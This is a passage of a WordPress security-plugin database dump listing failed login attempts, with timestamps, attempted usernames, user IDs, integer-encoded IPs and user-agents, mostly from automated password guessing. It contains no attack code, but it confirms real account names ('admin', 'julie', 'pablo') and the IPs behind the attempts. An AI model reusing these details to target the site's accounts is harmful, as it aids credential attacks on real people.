(101062, 1497033695.917547, 1, 'loginFailInvalidUsername', 'professionnel', 0, 1370067079, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101061, 1497033693.522078, 1, 'loginFailInvalidUsername', 'outils', 0, 1370067079, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101060, 1497033691.354818, 1, 'loginFailInvalidUsername', 'venez', 0, 1370067079, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101059, 1497033689.189838, 1, 'loginFailInvalidUsername', 'objectifs', 0, 1370067079, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101058, 1497033687.021186, 1, 'loginFailInvalidUsername', 'cross', 0, 1370067079, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101057, 1497033684.867739, 1, 'loginFailInvalidUsername', 'pour', 0, 1370067079, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101056, 1497033682.701817, 1, 'loginFailInvalidUsername', 'notre', 0, 1370067079, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101055, 1497016384.206237, 1, 'loginFailInvalidUsername', 'eboshi_creative', 0, 136172254, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101054, 1497016383.901174, 1, 'loginFailInvalidUsername', 'eboshi_creative', 0, 136172254, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101053, 1497016383.596472, 1, 'loginFailInvalidUsername', 'eboshi_creative', 0, 136172254, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101052, 1497016383.291340, 1, 'loginFailInvalidUsername', 'eboshi_creative', 0, 136172254, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101051, 1497016382.758177, 1, 'loginFailInvalidUsername', 'eboshi_creative', 0, 136172254, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101050, 1497016382.451468, 1, 'loginFailInvalidUsername', 'eboshi_creative', 0, 136172254, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101049, 1497016382.146403, 1, 'loginFailInvalidUsername', 'eboshi_creative', 0, 136172254, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101048, 1497016381.841153, 1, 'loginFailInvalidUsername', 'eboshi_creative', 0, 136172254, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101047, 1497016381.537410, 1, 'loginFailInvalidUsername', 'eboshi_creative', 0, 136172254, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101046, 1497016381.230815, 1, 'loginFailInvalidUsername', 'eboshi_creative', 0, 136172254, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101045, 1497016380.925106, 1, 'loginFailInvalidUsername', 'eboshi_creative', 0, 136172254, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101044, 1497016380.620797, 1, 'loginFailInvalidUsername', 'eboshi_creative', 0, 136172254, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101043, 1497016380.315569, 1, 'loginFailInvalidUsername', 'eboshi_creative', 0, 136172254, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101042, 1497016380.010622, 1, 'loginFailInvalidUsername', 'eboshi_creative', 0, 136172254, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101041, 1497016379.701810, 1, 'loginFailInvalidUsername', 'eboshi_creative', 0, 136172254, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101040, 1497016379.396739, 1, 'loginFailInvalidUsername', 'eboshi_creative', 0, 136172254, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101039, 1497016379.091231, 1, 'loginFailInvalidUsername', 'eboshi_creative', 0, 136172254, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101038, 1497016378.770787, 1, 'loginFailInvalidUsername', 'eboshi_creative', 0, 136172254, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101037, 1497016378.404917, 1, 'loginFailInvalidUsername', 'eboshi_creative', 0, 136172254, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101036, 1496919772.059001, 1, 'loginFailInvalidUsername', 'outils', 0, 1601092177, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101035, 1496919194.318696, 1, 'loginFailInvalidUsername', 'venez', 0, 1566171412, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101034, 1496919191.630188, 1, 'loginFailInvalidUsername', 'objectifs', 0, 1566171412, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101033, 1496919185.448511, 1, 'loginFailInvalidUsername', 'cross', 0, 1566171412, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101032, 1496919182.658880, 1, 'loginFailInvalidUsername', 'pour', 0, 1566171412, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101031, 1496919178.452563, 1, 'loginFailInvalidUsername', 'notre', 0, 1566171412, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101030, 1496919176.579034, 1, 'loginFailInvalidUsername', 'training', 0, 1566171412, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101029, 1496919174.610165, 1, 'loginFailInvalidUsername', 'vous', 0, 1566171412, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101028, 1496919171.674676, 1, 'loginFailValidUsername', 'pablo', 3, 1566171412, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101027, 1496919169.727080, 1, 'loginFailValidUsername', 'julie', 2, 1566171412, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101026, 1496919167.777137, 1, 'loginFailValidUsername', 'admin', 1, 1566171412, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101025, 1496904688.498907, 1, 'loginFailValidUsername', 'admin', 1, 2065606982, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101024, 1496843769.925089, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(101023, 1496843769.615325, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(101022, 1496843769.303257, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(101021, 1496843768.993924, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(101020, 1496843768.685997, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(101019, 1496843768.377463, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(101018, 1496843768.069639, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(101017, 1496843767.759059, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(101016, 1496843767.450081, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(101015, 1496843767.141164, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(101014, 1496843766.832388, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(101013, 1496843766.522076, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(101012, 1496843766.212633, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(101011, 1496843765.902572, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(101010, 1496843765.591760, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(101009, 1496843765.280997, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(101008, 1496843764.972371, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(101007, 1496843764.661667, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(101006, 1496843764.346411, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(101005, 1496831095.545210, 1, 'loginFailValidUsername', 'admin', 1, 3741061572, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(101004, 1496810935.567272, 1, 'loginFailInvalidUsername', 'notre', 0, 1109513350, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101003, 1496810373.897798, 1, 'loginFailValidUsername', 'admin', 1, 2745977144, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A'),
(101002, 1496807811.088165, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(101001, 1496807810.779653, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(101000, 1496807810.470249, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100999, 1496807810.160751, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100998, 1496807809.850779, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100997, 1496807809.541822, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100996, 1496807809.232268, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100995, 1496807808.923610, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100994, 1496807808.412905, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100993, 1496807808.104560, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100992, 1496807807.794730, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100991, 1496807807.485597, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100990, 1496807807.177319, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100989, 1496807806.867869, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100988, 1496807806.555530, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100987, 1496807806.246380, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100986, 1496807805.937507, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100985, 1496807805.627731, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100984, 1496807805.295366, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100983, 1496795053.728851, 1, 'loginFailValidUsername', 'admin', 1, 1053979479, 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)'),
(100982, 1496778654.448659, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100981, 1496778654.135607, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100980, 1496778653.821324, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100979, 1496778653.503362, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100978, 1496778653.193350, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100977, 1496778652.877891, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100976, 1496778652.562726, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100975, 1496778652.250898, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100974, 1496778651.940121, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100973, 1496778651.629892, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100972, 1496778651.318493, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100971, 1496778651.007807, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100970, 1496778650.692810, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100969, 1496778650.373988, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100968, 1496778650.063988, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100967, 1496778649.752180, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100966, 1496778649.438813, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100965, 1496778649.128236, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100964, 1496778648.805996, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100963, 1496753098.344955, 1, 'loginFailValidUsername', 'admin', 1, 3132510964, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100962, 1496742261.736167, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100961, 1496742261.424426, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100960, 1496742261.112623, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100959, 1496742260.797158, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100958, 1496742260.428147, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100957, 1496742260.117584, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100956, 1496742259.800880, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100955, 1496742259.490076, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100954, 1496742259.156649, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100953, 1496742258.697910, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100952, 1496742258.387864, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100951, 1496742258.077386, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100950, 1496742257.760424, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100949, 1496742257.446352, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100948, 1496742257.134197, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100947, 1496742256.823727, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0');
INSERT INTO `wp_wfLogins` (`id`, `ctime`, `fail`, `action`, `username`, `userID`, `IP`, `UA`) VALUES
(100946, 1496742256.511603, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100945, 1496742256.198350, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100944, 1496742255.883460, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100943, 1496711602.020060, 1, 'loginFailInvalidUsername', 'outils', 0, 2014968716, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100942, 1496709296.974567, 1, 'loginFailValidUsername', 'admin', 1, 3163163411, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100941, 1496708591.878705, 1, 'loginFailInvalidUsername', 'notre', 0, 1984277895, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100940, 1496707742.439463, 1, 'loginFailInvalidUsername', 'training', 0, 1109513350, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100939, 1496707740.532308, 1, 'loginFailInvalidUsername', 'vous', 0, 1109513350, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100938, 1496707738.663029, 1, 'loginFailValidUsername', 'pablo', 3, 1109513350, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100937, 1496707736.767955, 1, 'loginFailValidUsername', 'julie', 2, 1109513350, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100936, 1496707734.368431, 1, 'loginFailValidUsername', 'admin', 1, 1109513350, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100935, 1496707732.523045, 1, 'loginFailInvalidUsername', 'center', 0, 1109513350, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100934, 1496707730.728344, 1, 'loginFailInvalidUsername', 'namur', 0, 1109513350, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100933, 1496707728.922097, 1, 'loginFailInvalidUsername', 'travail', 0, 1109513350, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100932, 1496707727.118738, 1, 'loginFailInvalidUsername', 'professionnel', 0, 1109513350, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100931, 1496707725.299204, 1, 'loginFailInvalidUsername', 'outils', 0, 1109513350, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100930, 1496707085.118454, 1, 'loginFailValidUsername', 'admin', 1, 788319630, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100929, 1496685562.886583, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100928, 1496685562.542020, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100927, 1496685562.232984, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100926, 1496685561.922536, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100925, 1496685561.613747, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100924, 1496685561.304937, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100923, 1496685560.994716, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100922, 1496685560.686343, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100921, 1496685560.376230, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100920, 1496685560.068200, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100919, 1496685559.757421, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
